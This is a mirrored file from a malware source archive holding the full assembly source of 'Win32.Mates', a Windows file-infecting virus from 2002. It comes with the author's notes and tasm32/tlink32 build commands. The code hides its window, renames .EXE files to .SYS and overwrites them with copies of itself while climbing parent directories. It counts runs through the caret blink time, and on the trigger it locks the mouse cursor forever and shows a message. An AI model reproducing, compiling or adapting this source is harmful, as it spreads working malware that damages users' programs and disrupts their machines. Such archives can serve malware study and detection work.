mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 09:26:09 +00:00
452 lines
11 KiB
NASM
452 lines
11 KiB
NASM
COMMENT#
|
|
|
|
____________________________________________________________________________________________
|
|
...:: Win32.Mates - Virus ::...
|
|
- Version 1.0 -
|
|
- by DiA /auXnet -
|
|
- (c)02 [GermanY] -
|
|
____________________________________________________________________________________________
|
|
|
|
|
|
+++++Disclaimer+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
+I am NOT responsible for any damage that you do! You can need the code however you want...+
|
|
+My motherlanguage is not English, I hope you understand what I mean. +
|
|
+Feel FREE to write any Comments to +
|
|
+ DiA_hates_machine@gmx.de +
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
|
|
Why the Hell "Mates":
|
|
This Virus is written for all my Mates in real life!
|
|
|
|
|
|
How does it work:
|
|
- get da real host's name (.SYS)
|
|
- create a thread (Virus)
|
|
- run Host
|
|
Virus->
|
|
- start after five sek
|
|
- rename found .EXE file to .SYS
|
|
- copy itself in .EXE file
|
|
- if no more filez in current directory -> cd.. (with my method)
|
|
- infect again
|
|
- when no more fileZ check counter
|
|
- if no payload give full control to host
|
|
|
|
|
|
Payload:
|
|
- new counter method (via Get/Set CaretBlinkTime)
|
|
- set new caret blink time
|
|
- inc it
|
|
- 20 starts of da host???
|
|
- if yes set new caret blink time (-20) stop the mouse cursor and show a message
|
|
- if no inc it again and back to host
|
|
|
|
|
|
Special:
|
|
- the counter
|
|
- hide da fucking window (with TASM32)
|
|
- work with threads
|
|
|
|
|
|
Here comes da 1st geneartion:
|
|
|
|
;-----MatesSys.asm-----cut------------------------------------------------------------------
|
|
.386
|
|
.model flat
|
|
jumps
|
|
|
|
extrn MessageBoxA:PROC
|
|
extrn ExitProcess:PROC
|
|
|
|
.data
|
|
oTitle db '°°°1st Generation°°°',0
|
|
oMsg db 'This is da 1st generation of Win32.Mates - Virus',10,13
|
|
db ' by DiA /auXnet',10,13
|
|
db 'Have Fun...',0
|
|
|
|
.code
|
|
start:
|
|
|
|
push 0
|
|
push offset oTitle
|
|
push offset oMsg
|
|
push 0
|
|
call MessageBoxA
|
|
|
|
push 0
|
|
call ExitProcess
|
|
|
|
end start
|
|
;---------------------cut-------------------------------------------------------------------
|
|
|
|
|
|
To Compile the Mates - ViruS:
|
|
|
|
tasm32 /z /ml /m3 Mates,,;
|
|
tlink32 -Tpe -c Mates,Mates,, import32.lib
|
|
|
|
|
|
To Compile the Mates - SYS:
|
|
|
|
tasm32 /z /ml /m3 MatesSys,,;
|
|
tlink32 -Tpe -c MatesSys,MatesSys,, import32.lib
|
|
rename MatesSys.exe Mates.sys
|
|
|
|
#
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
.386
|
|
.model flat
|
|
jumps
|
|
|
|
|
|
;-----needed API's--------------------------------------------------------------------------
|
|
extrn MessageBoxA :PROC
|
|
extrn SetConsoleTitleA :PROC
|
|
extrn SetCursorPos :PROC
|
|
extrn SetCaretBlinkTime :PROC
|
|
extrn SetWindowPos :PROC
|
|
extrn SetCurrentDirectoryA :PROC
|
|
extrn Sleep :PROC
|
|
extrn FindWindowA :PROC
|
|
extrn FindFirstFileA :PROC
|
|
extrn FindNextFileA :PROC
|
|
extrn CreateThread :PROC
|
|
extrn CloseHandle :PROC
|
|
extrn CopyFileA :PROC
|
|
extrn CreateProcessA :PROC
|
|
extrn GetCommandLineA :PROC
|
|
extrn GetCaretBlinkTime :PROC
|
|
extrn lstrcpyA :PROC
|
|
extrn ExitProcess :PROC
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----data's for the Virus------------------------------------------------------------------
|
|
.data
|
|
oTitle db '[Win32.Mates Version 1.0]',0
|
|
oMsg db 'I WANNA SAY HELLO TO SOME MATES:',10,13
|
|
db ' o DeathRider - Colorado SuckZ, Bitch ;)',10,13
|
|
db ' o Herr H. - Smoke together!',10,13
|
|
db ' o Danny - Rock ''n Roll',10,13
|
|
db ' o Pascal - I need some weed...',10,13
|
|
db 'AND ALL THE OTHER FUCKERZ :)',10,13
|
|
db 'Ride On and THANX for all',10,13,10,13
|
|
db ' greetz DiA /auXnet',0
|
|
MyConsoleTitle db '.:.',0
|
|
FileMask db '*.EXE',0
|
|
WindowHandle dd 0
|
|
ThreadHandle dd 0
|
|
ThreadID dd 0
|
|
FindHandle dd 0
|
|
ProcessInfo dd 4 dup (0)
|
|
StartupInfo dd 4 dup (0)
|
|
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
|
|
TargetFile db 200d dup (0)
|
|
CreateFile db 200d dup (0)
|
|
VirusFile db 200d dup (0)
|
|
HostFile db 200d dup (0)
|
|
Directory db 200d dup (0)
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
;-----Rock 'n Roll--------------------------------------------------------------------------
|
|
.code
|
|
Mates:
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----hide da window------------------------------------------------------------------------
|
|
mov eax,offset MyConsoleTitle
|
|
push eax
|
|
call SetConsoleTitleA
|
|
|
|
call Sleep5 ;it suckz without sleep
|
|
|
|
mov eax,offset MyConsoleTitle
|
|
xor ebx,ebx
|
|
push eax
|
|
push ebx
|
|
call FindWindowA
|
|
mov dword ptr [WindowHandle],eax
|
|
|
|
call Sleep5
|
|
|
|
mov eax,01
|
|
xor ebx,ebx
|
|
mov edx,20000
|
|
push ebx
|
|
push eax
|
|
push eax
|
|
push edx
|
|
push edx
|
|
push ebx
|
|
push dword ptr [WindowHandle]
|
|
call SetWindowPos
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----create a thread (virus)---------------------------------------------------------------
|
|
mov eax,offset ThreadID
|
|
xor ecx,ecx
|
|
mov edx,offset RunMates
|
|
call MakeThread
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----get hostname (.sys) and run it--------------------------------------------------------
|
|
call GetCommandLineA ;via command line
|
|
|
|
mov edx,offset VirusFile
|
|
push eax
|
|
push edx
|
|
call lstrcpyA
|
|
|
|
mov esi,offset VirusFile ;fuck da "
|
|
call GetPoint
|
|
|
|
add esi,4d
|
|
mov dword ptr [esi],00000000h
|
|
|
|
push offset VirusFile+1
|
|
push offset HostFile
|
|
call lstrcpyA
|
|
|
|
mov esi,offset HostFile
|
|
call GetPoint
|
|
|
|
mov dword ptr [esi],5359532Eh ;rename to .SYS
|
|
|
|
mov eax,offset ProcessInfo
|
|
xor ebx,ebx
|
|
mov ecx,10h
|
|
mov edx,offset StartupInfo
|
|
mov edi,offset HostFile
|
|
push eax ;run host
|
|
push edx
|
|
push ebx
|
|
push ebx
|
|
push ecx
|
|
push ebx
|
|
push ebx
|
|
push ebx
|
|
push edi
|
|
push edi
|
|
call CreateProcessA
|
|
|
|
Wait4Mates:
|
|
jmp Wait4Mates ;wait for da virus
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
|
|
|
|
;-----here startz da virus (after 5sek)-----------------------------------------------------
|
|
RunMates:
|
|
mov eax,5000
|
|
push eax ;wait 5sek before run
|
|
call Sleep
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----cd.. with another method--------------------------------------------------------------
|
|
mov eax,offset HostFile
|
|
mov edx,offset Directory
|
|
push offset eax ;copy host name 2 directory
|
|
push offset edx
|
|
call lstrcpyA
|
|
|
|
mov esi,offset Directory
|
|
call GetPoint
|
|
|
|
mov edi,esi ;handle it in edi
|
|
mov dword ptr [edi],00000000h ;fuck da point
|
|
|
|
DotDot: ;it workz!
|
|
cmp byte ptr [edi],'\'
|
|
jz ClearAndSet
|
|
cmp byte ptr [edi],':' ;C:\ -> cd.. -> suckz
|
|
jz CheckBlink
|
|
dec edi
|
|
jmp DotDot
|
|
|
|
ClearAndSet:
|
|
inc edi
|
|
mov dword ptr [edi],00000000h
|
|
sub edi,2
|
|
|
|
mov eax,offset Directory
|
|
push eax
|
|
call SetCurrentDirectoryA
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----infect some filez---------------------------------------------------------------------
|
|
mov eax,offset Win32FindData
|
|
mov edx,offset FileMask
|
|
push eax
|
|
push edx
|
|
call FindFirstFileA
|
|
mov dword ptr [FindHandle],eax
|
|
|
|
FindNext:
|
|
cmp eax,-1 ;error -> cd..
|
|
je DotDot
|
|
test eax,eax ;no more filez -> cd..
|
|
jz DotDot
|
|
|
|
mov eax,offset TargetFile
|
|
mov edx,offset CreateFile
|
|
push eax
|
|
push edx
|
|
call lstrcpyA
|
|
|
|
mov esi,offset CreateFile
|
|
call GetPoint
|
|
|
|
mov dword ptr [esi],5359532Eh ;rename to .SYS
|
|
|
|
mov eax,offset CreateFile
|
|
mov edx,offset TargetFile
|
|
mov ecx,01
|
|
call CopyIt
|
|
|
|
mov eax,offset TargetFile
|
|
mov edx,offset VirusFile+1
|
|
xor ecx,ecx
|
|
call CopyIt
|
|
|
|
mov eax,offset Win32FindData
|
|
push eax ;search more filez
|
|
push dword ptr [FindHandle]
|
|
call FindNextFileA
|
|
jmp FindNext
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----the funny part ...the payload---------------------------------------------------------
|
|
CheckBlink:
|
|
call GetCaretBlinkTime ;kewl counter!
|
|
mov esi,eax ;handle it in esi
|
|
|
|
cmp esi,1520
|
|
ja Set1499 ;bigger
|
|
|
|
cmp esi,1500
|
|
jb Set1501 ;smaler than 1500 mil sek
|
|
|
|
GoOn:
|
|
cmp esi,1519
|
|
jne exit ;exit when not 1519
|
|
|
|
inc esi
|
|
call SetBlink ;inc da counter
|
|
|
|
mov eax,offset ThreadID
|
|
xor ecx,ecx
|
|
mov edx,offset Message
|
|
call MakeThread ;show a nice message
|
|
|
|
CursorSleep: ;fuck da cursor
|
|
mov eax,666
|
|
mov edx,999
|
|
push eax
|
|
push edx
|
|
call SetCursorPos
|
|
jmp CursorSleep ;foreva ;)
|
|
|
|
exit:
|
|
inc esi
|
|
call SetBlink ;inc da counter
|
|
|
|
xor eax,eax ;null
|
|
push eax
|
|
call ExitProcess ;give full control to host
|
|
|
|
Set1501:
|
|
mov esi,1501
|
|
call SetBlink
|
|
jmp GoOn
|
|
|
|
Set1499:
|
|
mov esi,1499 ;go from start
|
|
call SetBlink
|
|
jmp exit
|
|
|
|
ret ;thraedend
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----Sleep5 procedure----------------------------------------------------------------------
|
|
Sleep5:
|
|
mov eax,05
|
|
push eax
|
|
call Sleep
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----GetPoint procedure--------------------------------------------------------------------
|
|
GetPoint:
|
|
cmp byte ptr [esi],'.'
|
|
jz PointFound
|
|
inc esi
|
|
jmp GetPoint
|
|
PointFound:
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----MakeThread procedure------------------------------------------------------------------
|
|
MakeThread:
|
|
push eax
|
|
push ecx
|
|
push ecx
|
|
push edx
|
|
push ecx
|
|
push ecx
|
|
call CreateThread
|
|
mov dword ptr [ThreadHandle],eax
|
|
|
|
push dword ptr [ThreadHandle]
|
|
call CloseHandle
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----Message Thread------------------------------------------------------------------------
|
|
Message:
|
|
mov eax,offset oTitle
|
|
mov edx,offset oMsg
|
|
xor ebx,ebx
|
|
push ebx
|
|
push eax
|
|
push edx
|
|
push ebx
|
|
call MessageBoxA
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----CopyIt procedure----------------------------------------------------------------------
|
|
CopyIt:
|
|
push ecx
|
|
push eax
|
|
push edx
|
|
call CopyFileA
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
|
|
;-----SetBlink procedure--------------------------------------------------------------------
|
|
SetBlink:
|
|
push esi
|
|
call SetCaretBlinkTime
|
|
ret
|
|
;-------------------------------------------------------------------------------------------
|
|
|
|
end Mates |